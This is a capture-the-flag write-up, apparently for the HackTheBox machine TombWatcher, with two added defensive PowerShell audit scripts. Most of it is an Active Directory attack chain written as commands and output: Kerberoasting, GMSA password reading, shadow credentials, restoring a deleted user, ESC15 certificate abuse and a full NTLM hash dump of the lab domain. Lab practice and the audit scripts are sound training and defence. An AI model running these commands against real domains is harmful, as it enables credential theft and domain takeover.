Basic information

As is common in real life Windows pentests, you will start the TombWatcher box with credentials for the following account: henry / H3nry_987TGV!

Port scan

Port 80 plus the usual domain-controller ports:

$ nmap -sC -sV -Pn 10.10.11.72
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-11 13:33 JST
Nmap scan report for 10.10.11.72
Host is up (0.20s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-11 08:13:56Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
|_ssl-date: 2025-06-11T08:15:20+00:00; +3h38m13s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-11T08:15:21+00:00; +3h38m13s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
|_ssl-date: 2025-06-11T08:15:20+00:00; +3h38m13s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
|_ssl-date: 2025-06-11T08:15:21+00:00; +3h38m13s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3h38m12s, deviation: 0s, median: 3h38m12s
| smb2-time:
| date: 2025-06-11T08:14:41
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 236.67 seconds

80

Browsing to it directly just shows the IIS default page; set it aside for now:

bloodhound

Since a set of credentials is already provided, add the hosts entry, then run the usual BloodHound collection and extract the usernames:

bloodhound-python -u Henry -p 'H3nry_987TGV!' -d tombwatcher.htb -ns 10.10.11.72 -c All --zip

netexec smb 10.10.11.72 -u 'henry' -p 'H3nry_987TGV!' --rid-brute | grep SidTypeUser | cut -d ':' -f2 | cut -d '\' -f2 | cut -d ' ' -f1 > users.txt

BloodHound shows that henry has WriteSPN over alfred:

users.txt

Administrator
Guest
krbtgt
DC01$
Henry
Alfred
sam
john
ansible_dev$

henry to alfred

With WriteSPN the obvious move is to write an SPN and then Kerberoast; cracking the resulting hash gives Alfred's password:

faketime "$(curl -sik http://10.10.11.72:5985 | grep -i 'Date: ' | sed s/'Date: '//g)" bash

python3 targetedKerberoast.py -d tombwatcher.htb -u 'henry' -p 'H3nry_987TGV!' --request-user Alfred --dc-ip 10.10.11.72

sudo john hash.txt -w /usr/share/wordlists/rockyou.txt

basketball


alfred to ansible_dev$

alfred cannot log in, but has AddSelf on the INFRASTRUCTURE group, and INFRASTRUCTURE in turn has the right to read a GMSA password:

So first use AddSelf to add alfred to INFRASTRUCTURE, then read the GMSA password to obtain ansible_dev$:

bloodyAD --host 10.10.11.72 -d tombwatcher.htb -u alfred  -p basketball add groupMember 'CN=INFRASTRUCTURE,CN=USERS,DC=TOMBWATCHER,DC=HTB' 'CN=ALFRED,CN=USERS,DC=TOMBWATCHER,DC=HTB'

nxc ldap 10.10.11.72 -u alfred -p 'basketball' --gmsa

Account: ansible_dev$ NTLM: 1c37d00093dc2a5f25176bf2d474afdc PrincipalsAllowedToReadPassword: Infrastructure

ansible_dev$ to SAM

ansible_dev$ in turn has ForceChangePassword over SAM, so simply reset the password:

bloodyAD --host 10.10.11.72 -d tombwatcher.htb -u 'ANSIBLE_DEV$' -p ':1c37d00093dc2a5f25176bf2d474afdc' set password 'SAM' 'Passw@rd'

sam to john

sam in turn has WriteOwner over john, so either take ownership, grant yourself rights and reset the password, or use shadow credentials to obtain John's hash:

# change the owner
bloodyAD --host 10.10.11.72 -d tombwatcher.htb -u sam -p 'Passw@rd' set owner john sam

# grant rights
bloodyAD --host 10.10.11.72 -d "tombwatcher.htb" -u "sam" -p 'Passw@rd' add genericAll "john" "sam"

# shadow creds
bloodyAD --host 10.10.11.72 -d tombwatcher.htb -u 'sam' -p 'Passw@rd' add shadowCredentials john

python3 PKINITtools/gettgtpkinit.py -cert-pem PrV3BYhu_cert.pem -key-pem PrV3BYhu_priv.pem tombwatcher.htb/john PrV3BYhu.ccache

export KRB5CCNAME=PrV3BYhu.ccache
python3 PKINITtools/getnthash.py tombwatcher.htb/john -key 670ceb494e639e93c5765259c0f98434344cb4885c34aebe93c0ccff620b0b23

Recovered NT Hash
ad9324754583e3e42b55aad4d3b8d2bf
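The whole chain from henry to john rests on object ACEs (WriteSPN, AddSelf, ForceChangePassword, WriteOwner, GenericAll) granted to ordinary accounts. The following audit script is an added example, not part of the original write-up; it assumes a domain-joined host with the RSAT ActiveDirectory module and reports such ACEs on every user and group object so they can be reviewed and removed before BloodHound finds them.

```powershell
# Added audit example (not from the original write-up): enumerate ACEs on domain users and groups
# that grant the rights abused in this chain (WriteSPN, AddSelf, ForceChangePassword, WriteOwner,
# WriteDacl, GenericAll) to principals outside the usual administrative groups.
# Assumes a domain-joined host with the RSAT ActiveDirectory module (it uses the AD: drive).
Import-Module ActiveDirectory

# Well-known schema GUIDs for the object-specific rights; the value is the BloodHound edge name.
$rightGuids = @{
    'f3a64788-5306-11d1-a9c5-0000f80367c1' = 'WriteSPN'            # servicePrincipalName / Validated-SPN
    'bf9679c0-0de6-11d0-a285-00aa003049e2' = 'AddSelf'             # Self right on the member attribute
    '00299570-246d-11d0-a768-00aa006e0529' = 'ForceChangePassword' # User-Force-Change-Password extended right
}
$GenericAll = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll
$WriteOwner = [System.DirectoryServices.ActiveDirectoryRights]::WriteOwner
$WriteDacl  = [System.DirectoryServices.ActiveDirectoryRights]::WriteDacl
# Principals expected to hold broad rights; anything else is reported.
$expected = '^(NT AUTHORITY\\SYSTEM|BUILTIN\\Administrators|.*\\(Domain Admins|Enterprise Admins|Account Operators))$'

$objects = Get-ADObject -LDAPFilter '(|(objectClass=user)(objectClass=group))' `
    -SearchBase (Get-ADDomain).DistinguishedName
foreach ($obj in $objects) {
    $acl = Get-Acl -Path ('AD:\' + $obj.DistinguishedName)
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($ace.IdentityReference.Value -match $expected) { continue }
        $rights  = $ace.ActiveDirectoryRights
        $guid    = $ace.ObjectType.ToString()
        $finding = $null
        # Generic rights are bit masks, so check that the whole mask is present, not just any bit.
        if (($rights -band $GenericAll) -eq $GenericAll)     { $finding = 'GenericAll' }
        elseif (($rights -band $WriteOwner) -eq $WriteOwner) { $finding = 'WriteOwner' }
        elseif (($rights -band $WriteDacl) -eq $WriteDacl)   { $finding = 'WriteDacl' }
        elseif ($rightGuids.ContainsKey($guid))              { $finding = $rightGuids[$guid] }
        if ($finding) {
            [pscustomobject]@{
                Object    = $obj.Name
                Principal = $ace.IdentityReference.Value
                Right     = $finding
                Inherited = $ace.IsInherited
            }
        }
    }
}
```

Run it as an account that can read the DACLs (any domain user can, by default); inherited ACEs usually come from an OU and should be fixed there rather than on each object.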

user flag

Log in as john to get user.txt:

ADCS

john has GenericAll over ADCS, but there are no users under ADCS; they were deleted (someone else had presumably already restored it here, which is why the BloodHound data contains the cert_admin user):

Checking deleted objects shows the cert_admin entry:

Get-ADObject -Filter 'isDeleted -eq $true -and objectClass -eq "user"' -IncludeDeletedObjects -Properties objectSid, lastKnownParent, ObjectGUID | Select-Object Name, ObjectGUID, objectSid, lastKnownParent | Format-List

So restore the deleted user, then use GenericAll on it:

Restore-ADObject -Identity '938182c3-bf0b-410a-9aaa-45c8e1a02ebf'
Set-ADAccountPassword -Identity cert_admin -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Passw@rd" -Force)
Enable-ADAccount -Identity cert_admin

ESC15

The cert_admin user cannot log in either, but since it is ADCS-related, a routine certipy run turns up ESC15:

certipy-ad find -u cert_admin -p 'Passw@rd' -stdout -vulnerable -dc-ip 10.10.11.72

So exploit ESC15 to obtain administrator:

(Scenario 2, similar to ESC3)

certipy-ad req -u 'cert_admin@tombwatcher.htb' -p 'Passw@rd' -application-policies "1.3.6.1.4.1.311.20.2.1" -ca tombwatcher-CA-1 -template WebServer -dc-ip 10.10.11.72

certipy-ad req -u 'cert_admin@tombwatcher.htb' -p 'Passw@rd' -on-behalf-of TOMBWATCHER\\Administrator -template User -ca tombwatcher-CA-1 -pfx cert_admin.pfx -dc-ip 10.10.11.72

certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.72

[*] Got hash for 'administrator@tombwatcher.htb': aad3b435b51404eeaad3b435b51404ee:f61db423bebe3328d33af26741afe5fc
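ESC15 works here because WebServer is a schema-version-1 template that lets the enrollee supply the subject, so the application policies in the CSR are honoured. The following check is an added example, not from the original write-up or from certipy; it assumes a domain-joined host with the RSAT ActiveDirectory module and lists the published templates that meet that precondition.

```powershell
# Added audit example (not from the original write-up): list certificate templates that meet the
# ESC15 precondition (schema version 1 and CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) and the CAs publishing them.
# Assumes a domain-joined host with the RSAT ActiveDirectory module.
Import-Module ActiveDirectory

$pkiBase = 'CN=Public Key Services,CN=Services,' + (Get-ADRootDSE).configurationNamingContext
$ENROLLEE_SUPPLIES_SUBJECT = 0x1   # bit in msPKI-Certificate-Name-Flag

# Map template name -> CAs that publish it (certificateTemplates on each pKIEnrollmentService object).
$published = @{}
Get-ADObject -SearchBase "CN=Enrollment Services,$pkiBase" -LDAPFilter '(objectClass=pKIEnrollmentService)' `
    -Properties certificateTemplates | ForEach-Object {
        $ca = $_.Name
        foreach ($t in $_.certificateTemplates) {
            if (-not $published.ContainsKey($t)) { $published[$t] = @() }
            $published[$t] += $ca
        }
    }

Get-ADObject -SearchBase "CN=Certificate Templates,$pkiBase" -LDAPFilter '(objectClass=pKICertificateTemplate)' `
    -Properties 'msPKI-Template-Schema-Version','msPKI-Certificate-Name-Flag','pKIExtendedKeyUsage' |
    Where-Object {
        $_.'msPKI-Template-Schema-Version' -eq 1 -and
        ($_.'msPKI-Certificate-Name-Flag' -band $ENROLLEE_SUPPLIES_SUBJECT) -ne 0 -and
        $published.ContainsKey($_.Name)
    } |
    ForEach-Object {
        [pscustomobject]@{
            Template    = $_.Name
            PublishedBy = ($published[$_.Name] -join ', ')
            EKUs        = ($_.pKIExtendedKeyUsage -join ', ')
        }
    }
```

Each template reported should have its enrollment permissions reviewed (on this box cert_admin could enroll in WebServer) or be unpublished if it is not needed.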

root flag

Log in as administrator:

evil-winrm -i 10.10.11.72 -u Administrator -H f61db423bebe3328d33af26741afe5fc

hashdump

impacket-secretsdump Administrator@10.10.11.72 -hashes :f61db423bebe3328d33af26741afe5fc -just-dc-ntlm

Administrator:500:aad3b435b51404eeaad3b435b51404ee:f61db423bebe3328d33af26741afe5fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:964accf7288128f78f8638bbc42f6456:::
Henry:1103:aad3b435b51404eeaad3b435b51404ee:2f3b5dd61cd9784435ee12a93c93fa6c:::
Alfred:1104:aad3b435b51404eeaad3b435b51404ee:cf5fd610b326e61f175e3a9bac4751f9:::
sam:1105:aad3b435b51404eeaad3b435b51404ee:01794af19fd00af4f2528923c4ef08be:::
john:1106:aad3b435b51404eeaad3b435b51404ee:ad9324754583e3e42b55aad4d3b8d2bf:::
cert_admin:1111:aad3b435b51404eeaad3b435b51404ee:01794af19fd00af4f2528923c4ef08be:::
jack:7601:aad3b435b51404eeaad3b435b51404ee:5243097f144b10181c469f4052ab3edb:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:ca045fb171f8b565d6e772b0a75c6f5f:::
ansible_dev$:1108:aad3b435b51404eeaad3b435b51404ee:1c37d00093dc2a5f25176bf2d474afdc:::

References